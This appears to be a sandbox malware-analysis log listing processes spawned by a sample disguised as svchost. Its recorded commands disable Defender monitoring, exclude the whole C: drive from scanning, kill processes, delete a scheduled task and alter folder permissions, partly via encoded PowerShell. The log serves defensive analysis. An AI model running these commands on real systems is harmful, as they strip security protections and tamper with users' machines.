Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Users\mig.exe "C:\users\mig.exe" Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start MicrosoftESS Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start MicrosoftESS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIABzAHQAbwBwACAAdwBtAHMAZQByAHYAaQBjAGUACgB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAIAAvAGkAbQAgAG0AaQBnAHIAYQB0AGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAASQBuAHQAZQBsAEMAbwBuAGYAaQBnAFMAZQByAHYAaQBjAGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAATQBTAFQAYQBzAGsALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAUwB1AHAAZQByAGYAZQB0AGMAaAAuAGUAeABlAAoAdABhAHMAawBrAGkAbABsACAALwBmACAALwBpAG0AIABXAG0AaQBpAGMALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAVwByAGEAcAAuAGUAeABlAAoAYwBtAGQAIAAvAGMAIAB0AGEAawBlAG8AdwBuACAALwBGACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzACIACgBzAGMAaAB0AGEAcwBrAHMAIAAvAGQAZQBsAGUAdABlACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIgAgAC8ARgAKAGMAbQBkACAALwBjACAAdABhAGsAZQBvAHcAbgAgAC8ARgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbQBpAGcAcgBhAHQAZQAuAGUAeABlACIACgBjAG0AZAAgAC8AYwAgAGQAZQBsACAALwBGACAALwBRACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABtAGkAZwByAGEAdABlAC4AZQB4AGUAIgAKAAoA
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" stop wmservice
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn WindowsUpdate /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del /F /Q C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wmservice
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Uses taskkill to terminate processes
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiabzahqabwbwacaadwbtahmazqbyahyaaqbjaguacgb0ageacwbragsaaqbsagwaiaavagyaiaavagkabqagag0aaqbnahiayqb0agualgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaasqbuahqazqbsaemabwbuagyaaqbnafmazqbyahyaaqbjagualgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaatqbtafqayqbzagsalgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaauwb1ahaazqbyagyazqb0agmaaaauaguaeablaaoadabhahmaawbragkababsacaalwbmacaalwbpag0aiabxag0aaqbpagmalgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaavwbyageacaauaguaeablaaoaywbtagqaiaavagmaiab0ageaawblag8adwbuacaalwbgacaaigbjadoaxab3agkabgbkag8adwbzafwadabhahmaawbzaciacgbzagmaaab0ageacwbrahmaiaavagqazqbsaguadablacaalwb0ag4aiaaiafcaaqbuagqabwb3ahmavqbwagqayqb0aguaigagac8argakagmabqbkacaalwbjacaadabhagsazqbvahcabgagac8argagaciaqwa6afwauabyag8azwbyageabqbeageadabhafwabqbpagcacgbhahqazqauaguaeablaciacgbjag0azaagac8aywagagqazqbsacaalwbgacaalwbracaaigbdadoaxabqahiabwbnahiayqbtaeqayqb0ageaxabtagkazwbyageadablac4azqb4aguaigakaaoa
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiabzahqabwbwacaadwbtahmazqbyahyaaqbjaguacgb0ageacwbragsaaqbsagwaiaavagyaiaavagkabqagag0aaqbnahiayqb0agualgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaasqbuahqazqbsaemabwbuagyaaqbnafmazqbyahyaaqbjagualgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaatqbtafqayqbzagsalgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaauwb1ahaazqbyagyazqb0agmaaaauaguaeablaaoadabhahmaawbragkababsacaalwbmacaalwbpag0aiabxag0aaqbpagmalgblahgazqakahqayqbzagsaawbpagwabaagac8azgagac8aaqbtacaavwbyageacaauaguaeablaaoaywbtagqaiaavagmaiab0ageaawblag8adwbuacaalwbgacaaigbjadoaxab3agkabgbkag8adwbzafwadabhahmaawbzaciacgbzagmaaab0ageacwbrahmaiaavagqazqbsaguadablacaalwb0ag4aiaaiafcaaqbuagqabwb3ahmavqbwagqayqb0aguaigagac8argakagmabqbkacaalwbjacaadabhagsazqbvahcabgagac8argagaciaqwa6afwauabyag8azwbyageabqbeageadabhafwabqbpagcacgbhahqazqauaguaeablaciacgbjag0azaagac8aywagagqazqbsacaalwbgacaalwbracaaigbdadoaxabqahiabwbnahiayqbtaeqayqb0ageaxabtagkazwbyageadablac4azqb4aguaigakaaoa
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000A050 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_000000014000A050
Contains functionality to query CPU information (cpuid)
Source: C:\Users\123.exe Code function: 3_2_00ECF654 cpuid 3_2_00ECF654
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00417A20
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_029F7C87
Source: C:\Users\123.exe Code function: GetLocaleInfoW,GetNumberFormatW, 3_2_00ECAF0F
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: GetLocaleInfoA, 6_2_00000001400245E8
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
